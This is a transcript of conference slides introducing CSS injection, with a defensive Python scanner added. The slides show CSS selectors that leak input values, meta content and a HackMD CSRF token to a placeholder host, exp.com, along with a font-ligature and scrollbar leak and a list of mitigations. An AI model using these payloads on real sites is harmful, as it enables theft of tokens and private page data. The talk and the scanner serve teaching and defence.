Attacking web without JS - CSS injection

Huli
September 22, 2022

When speaking of web security in front-end, XSS is the first thing that comes to mind. But, even without JavaScript, the attacker can still use other attack vectors like HTML injection and CSS injection! This talk is an introduction to CSS injection.

Transcript

  1. Attacking web without JS
    CSS Injection
    Huli from Cymetrics / OneInfinity @ CYBERSEC 2022

    View Slide

  2. About
    Huli
    • Security Researcher at Cymetrics / OneInfinity
    • CTF player at Water Paddler
    • https://blog.huli.tw/

  3. Front-end Security

    View Slide

  4. Front-end Security
    => XSS (Cross-Site Scripting)

  5. Front-end Security
    => XSS (Cross-Site Scripting)

  6. IE7 (15 years ago)

    View Slide

  7. CSS injection
    => Steal data via CSS

    View Slide

  8. CSS injection
    => Steal data via CSS
    How?

    View Slide

  9. input[value^="a"] {
       background: url("//exp.com?a");
     }

  10. CSS selectors
    input[value^="a"]  /* prefix   */
    input[value$="a"]  /* suffix   */
    input[value*="a"]  /* contains */

  11. Steal input value

  12. Steal input value
    input[value^="a"] {
      background: url("//exp.com?a");
    }

  13. Steal input value
    input[value^="a"] + input {
      background: url("//exp.com?a");
    }

  14. Steal input value

  15. :has() to the rescue
    form:has(input[value^="a"]) {
      background: url("//exp.com?a");
    }

  17. Steal meta content

  18. Steal meta content
    meta[content^="a"] {
      background: url(//exp.com?a);
    }

  19. Steal meta content
    meta[content^="a"] {
      background: url(//exp.com?a);
    }

  20. Steal meta content
    meta {
      display: block;
    }
    meta[content^="a"] {
      background: url(//exp.com?a);
    }

  21. Steal meta content
    meta {
      display: block;
    }
    meta[content^="a"] {
      background: url(//exp.com?a);
    }

  22. Steal meta content
    meta[content^="a"] {
      background: url(//exp.com?a);
    }

  23. Steal meta content
    meta, head {
      display: block;
    }
    meta[content^="a"] {
      background: url(//exp.com?a);
    }

  26. Steal HackMD CSRF token

  27. Steal HackMD CSRF token

  28. Steal HackMD CSRF token
    HackMD Server

  29. Steal HackMD CSRF token
    HackMD Server
    server?token=a

  30. Steal HackMD CSRF token
    HackMD Server
    server?token=a
    Update content and <br/>

  31. Steal HackMD CSRF token
    HackMD Server
    server?token=ab
    Update content and <br/>

  32. Demo

  33. Steal CSRF token != CSRF 😢

  34. Steal any content
    var secret = "abc123";
    Is it possible?

  35. ligature
    https://zh.m.wikipedia.org/zh-tw/File:Ligatures.svg

  36. ligature
    horiz-adv-x="10000" d="M1 0z"/>

  37. ligature + scroll bar
    script {
      width: 300px;
      display: block;
      font-family: "leak";
      white-space: nowrap;
      overflow-x: auto;
    }
    script::-webkit-scrollbar {
      background: blue;
    }
    script::-webkit-scrollbar:horizontal {
      background: url(https://exp.com?a);
    }

  38. ligature + scroll bar

  39. Mitigation
    • Sanitization
    • Content Security Policy
      • style-src
      • font-src
    • Check Origin/Referer header
    • Same-site cookie
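As an added example (not from the talk), the "Sanitization" point in practice: a defender-side heuristic scanner for user-supplied CSS that flags the primitives these slides rely on, that is attribute prefix/suffix/substring probes, an @font-face loaded from a foreign host, and ::-webkit-scrollbar rules, whenever they reference a url() outside an allow-list. The sample stylesheet, the host exp.com and the allow-list entry cdn.example are constructed for the demonstration.

```python
import re
from urllib.parse import urlsplit

# Heuristic scanner, not a full CSS parser: splits the text into "selector { body }" rules.
RULE = re.compile(r'([^{}]+)\{([^{}]*)\}', re.DOTALL)
# Prefix (^=), suffix ($=) and substring (*=) attribute selectors: the per-character probes.
ATTR_PROBE = re.compile(r'\[\s*[\w-]+\s*[\^$*]=')
URL_FUNC = re.compile(r'url\(\s*["\']?([^"\')\s]+)', re.IGNORECASE)  # target of url(...)

def is_external(url, allowed_hosts):
    """True when the URL leaves the page's origin ("//host" is protocol-relative, as on the slides)."""
    if url.startswith('//'):
        url = 'https:' + url
    host = urlsplit(url).netloc.lower()
    return bool(host) and host not in allowed_hosts

def find_css_exfil(css, allowed_hosts=frozenset()):
    """Return (kind, selector, url) for every rule that can carry page data to a foreign host."""
    findings = []
    for selector, body in RULE.findall(css):
        selector = ' '.join(selector.split())
        for url in URL_FUNC.findall(body):
            if not is_external(url, allowed_hosts):
                continue
            if selector.lower().startswith('@font-face'):
                findings.append(('external-font', selector, url))    # SVG-font ligature leak
            elif ATTR_PROBE.search(selector):
                findings.append(('attribute-probe', selector, url))  # value^= / content^= probe
            elif '::-webkit-scrollbar' in selector.lower():
                findings.append(('scrollbar-probe', selector, url))  # overflow-triggered fetch
            else:
                findings.append(('external-url', selector, url))     # plain external fetch
    return findings

# Constructed sample stylesheet that reproduces the slides' primitives (not real traffic).
SAMPLE_CSS = """
input[value^="a"] { background: url("//exp.com?a"); }
form:has(input[value^="a"]) { background: url("//exp.com?a"); }
meta { display: block; }
meta[content^="a"] { background: url(//exp.com?a); }
@font-face { font-family: "leak"; src: url(https://exp.com/leak.svg); }
script::-webkit-scrollbar:horizontal { background: url(https://exp.com?a); }
.logo { background: url(/static/logo.png); }
.cdn { background: url(https://cdn.example/logo.png); }
"""

if __name__ == "__main__":
    for kind, selector, url in find_css_exfil(SAMPLE_CSS, frozenset({"cdn.example"})):
        print(f"{kind:16} {selector:40} -> {url}")
```

A clean stylesheet such as the .logo rule produces no finding; only the five rules that fetch from exp.com are reported, each tagged with the primitive it matches.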

  40. Reference
    1. https://vwzq.net/slides/2019-s3_css_injection_attacks.pdf
    2. https://x-c3ll.github.io/posts/CSS-Injection-Primitives/
    3. https://book.hacktricks.xyz/pentesting-web/xs-search/css-injection
    4. https://research.securitum.com/stealing-data-in-great-style-how-to-use-css-to-attack-web-application/
    5. https://mksben.l0.cm/2021/11/css-exfiltration-svg-font.html
    6. https://github.com/masatokinugawa/css-exfiltration-svg-font/

  41. Q&A